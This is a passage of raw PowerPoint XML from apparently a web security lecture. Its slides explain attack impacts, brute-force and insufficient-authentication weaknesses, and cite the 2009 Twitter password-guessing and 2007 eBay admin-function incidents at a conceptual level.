              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Stealing browser history and compromising privacy of user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Evading or disabling phishing filters and thus opening up new avenues for attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Circumvent other security controls like bypassing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Installing malicious software (like Trojans/ Rootkits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Spamming …..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>On the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Defacing pages / Altering content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Injecting malicious content in dynamically served pages and thus infecting all users who visit the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Denial of service on the server resulting in downtime and hence loss of business</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Scanning intranet for vulnerable machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Spamming …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:cs typeface="Geneva" pitchFamily="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tLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Authentication Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46085" name="Footer Placeholder 4"/>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890E490-A94C-48A7-98A1-4F29D0F76C2D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B05020201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ltLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Brute Force Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4710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99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F04C983-CD2C-40D6-84EA-FAB03A0BF0DA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Brute Force attack is an automated process of trial and error used to guess a person</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>s username, password, session ids, credit-card, cryptographic key or anything that is unique to the user and authenticates him.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Two types of Brute Force attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Normal : Uses a single username against many passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Reverse: Uses many usernames against a single password. In a system with millions of accounts, the odds of finding two users with same password increases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Brute-forcing is easy when websites do not implement any form of account lockout policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="955E4B"/>
              </a:solidFill>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" i="1" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300" i="1" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="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tLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Brute Force Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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09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A2955FB-0FA1-4D05-8568-653B3246F3A8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Twitter hacked using Brute Force (Jan 09) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://blog.wired.com/27bstroke6/2009/01/professed-twitt.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A hacker, who goes by the handle GMZ, gained entry to Twitter's administrative control panel by pointing an automated password-guesser at a popular user's account. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The user turned out to be a member of Twitter's support staff, who'd chosen the weak password "happiness." </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Cracking the site was easy, because Twitter allowed an unlimited number of rapid-fire log-in attempts. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Implications : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The hacker managed to send tweets posing as Obama, Britney and O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Reilly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3"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a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Insufficient Authentication</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19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6380402-21AA-4B7D-A16C-52AAE0FD9340}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41988" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Happens when a website allows users to access sensitive content or functionality without proper authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Many websites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>hide resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> by not linking the location into the main website. But this is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" i="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>security through obscurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>For example, many times web servers have an /admin directory which is not linked to the main website. But if not properly configured for permissions, a user can view the contents by typing in the right URLs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This is also referred in OWASP Top 10 of 2007 as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Failure to restrict URL access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="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a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Insufficient Authentication Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5018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30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EB3C493-5333-44A5-B25A-6918FF67379F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>eBay hacked and many users accounts got suspended by hacker (Oct 07) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.auctionbytes.com/cab/abn/y07/m10/i09/s01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The hacker found very old administrative functions that had not been deactivated several years ago when the security of internal systems was changed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>These functions were still accessible on public servers, while the rest of the functionality was behind multiple layers of security. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Weak Password Recovery Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51204"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40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08FA4F-19C3-40C1-81E1-9DFB4AC009A6}" type="slidenum">
